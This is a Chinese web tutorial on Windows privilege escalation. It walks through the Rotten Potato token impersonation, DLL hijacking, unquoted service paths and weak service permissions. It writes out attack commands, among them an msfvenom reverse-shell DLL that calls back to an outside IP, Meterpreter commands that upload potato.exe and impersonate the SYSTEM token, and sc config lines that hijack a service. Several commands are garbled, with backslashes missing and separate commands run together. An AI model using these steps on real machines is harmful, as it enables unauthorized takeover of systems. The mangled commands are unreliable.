欢迎您访问365答案网,请分享给你的朋友!
生活常识 学习资料

提权-win烂土豆&dll劫持&引号路径&服务权限

时间:2023-07-26

以下几种提权方法的适合环境(web用户/本机用户)因方法而不同,有的方法在两种权限下都适用,一般也都是本机权限大于webshell权限。

win 烂土豆提权(MS16-075):

烂土豆(Rotten Potato)提权是一个本地提权,是针对本地用户的,不能用于域用户,webshell环境或本地普通用户环境都可以适用。
过程:msf生成上传烂土豆-执行烂土豆-利用msf窃取模块-窃取 SYSTEM-成功(漏洞编号:CVE-2016-3225
)。

我们是用之前的令牌窃取提权无法成功,因为webshell用户权限太低,无法窃取到system用户权限,我们此时可以配合烂土豆来提权。
 
补充下之前令牌窃取的知识:
Windows中有两种令牌,一种是Delegation Token,是为交互式登录(比如登录进系统或者通过远程桌面连接到系统)创建的。另一种是Impersonmate Token(模仿令牌),它是为非交互式会话创建的。

利用一个shell脚本查看用户权限上传生成的后门并执行:
配合令牌窃取来进行,就是一套流程,从websehll权限到system权限:

upload /root/potato.exe C:UsersPubliccd C:\Users\Publicuse incognitolist_tokens -uexecute -cH -f ./potato.exelist_tokens -uimpersonate_token "NT AUTHORITY\SYSTEM"

参考:
windows提权方法总结
权限提升篇-令牌窃取与烂土豆提权
https://blog.csdn.net/qq_41874930/article/details/109766105

win dll劫持:

原理:Windows 程序启动的时候需要 DLL。如果这些 DLL 不存在,则可以通过在应用程序要查找的位置放置恶意 DLL 来提权。

通常,Windows 应用程序有其预定义好的搜索 DLL 的路径,它会根据下面的顺序进行搜索:
1、应用程序加载的目录
2、C:WindowsSystem32
3、C:WindowsSystem
4、C:Windows
5、当前工作目录 Current Working Directory,CWD
6、在 PATH 环境变量的目录(先系统后用户)

过程:信息收集(搜集服务器上其他的第三方应用)-进程调试(分析这个程序启动时调用那些dll)-制作dll并上传-替换dll-启动应用后成功。(因为系统dll运行时根本无法查看,更不可能替换了,本地调试)

比如火绒剑分析:


msf利用:

msfvenom -p windows/meterpreter/reverse_tcplhost=101.37.169.46 lport=6677 -f dll >/opt/xiaodi.dll

替换dll,MSF监听,当软件执行时调用dll,反弹成功。

弊端:
dll劫持提权需要有特定软件应用并能替换以及管理员要启用才行,三个条件缺一不可。
AlwaysInstallElevated提权默认禁用配置,利用成功机会很少。所以说此方法比较鸡肋。

Win-不带引号服务路径配合 MSF(Web,本地权限):

原理:当 Windows 服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完
整路径,则系统会按字面解释它并执行。但是,如果服务的二进制路径未包含在引号中,则操作系
统将会执行找到的空格分隔的服务路径的第一个实例。


过程:检测引号服务路径-利用路径制作文件并上传-启用服务或重启-调用后成功

服务有没有引号,有引号的就正常,没有引号的话路径有没有空格,这样可能导致安全问题,比如空格后边被利用被当成参数执行,程序只执行参数之前的。

检测引号命令

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:Windows\" |findstr /i /v ""

启用程序时我们用msf监听就能发现回显,并且启动服务的时候都是system权限启动。

弊端:
1.引号与空格,满足这个条件的就不太多。
2.是否第三方应用并且能启用/重启服务,且路径无引号,系统程序一般替换不了。

win-不安全的服务权限配合MSF(本地权限):

原理:即使正确引用了服务路径,也可能存在其他漏洞。由于管理配置错误,用户可能对服务拥有
过多的权限,例如,可以直接修改它导致重定向执行文件。

过程:检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功

accesschk文件检测用户权限:

accesschk.exe -uwcqv "administrators" *sc config "NewServiceName" binpath="C:Program.exe"sc start "NewServiceName"

AlwaysInstallElevated 提权:默认禁用配置,利用成功机会很小。


参考:
Windows提权命令参考

// 这些提权方法大多都是msf、上传文件来进行,学到的是方法/思路,但真实环境利用自然没那么简单,涉及到免杀、waf等等。

Copyright © 2016-2020 www.365daan.com All Rights Reserved. 365答案网 版权所有 备案号:

部分内容来自互联网,版权归原作者所有,如有冒犯请联系我们,我们将在三个工作时内妥善处理。